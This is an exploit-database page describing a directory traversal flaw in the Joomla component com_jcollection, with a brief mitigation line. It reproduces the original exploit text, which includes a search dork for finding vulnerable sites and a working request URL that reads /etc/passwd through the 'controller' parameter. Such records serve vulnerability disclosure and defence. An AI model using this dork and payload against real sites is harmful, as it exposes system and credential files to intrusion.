header-logo
Suggest Exploit
vendor:
N/A
by:
FL0RiX
7,5
CVSS
HIGH
Directory Traversal
22
CWE
Product Name: N/A
Affected Version From: N/A
Affected Version To: N/A
Patch Exists: NO
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2020

Joomla Component com_jcollection

This vulnerability allows an attacker to read sensitive files on the server by exploiting a directory traversal vulnerability in the Joomla component com_jcollection. The vulnerability exists due to insufficient sanitization of user-supplied input to the 'controller' parameter of the 'index.php' script. A remote attacker can send a specially crafted HTTP request containing directory traversal sequences (e.g. '../../../../../../etc/passwd%00') and read arbitrary files from the server.

Mitigation:

Input validation should be performed to ensure that user-supplied input is properly sanitized.
Source

Exploit-DB raw data:

@~~=======================================~~@
@~~=Script : Joomla Component com_jcollection

@~~=Author : FL0RiX

@~~=Greez : Dost mu var?

@~~=Bug Type : Directory Traversal

@~~=Dork : inurl:"com_jcollection "

@~~=Note: Kimseye Hakettiginden Fazla Deger Vermeyeceksin.

@~~=======================================~~@

@~~=Vuln.

: http://site/ [Yol] /index.php?option=com_jcollection&controller=../../../../../../../etc/passwd%00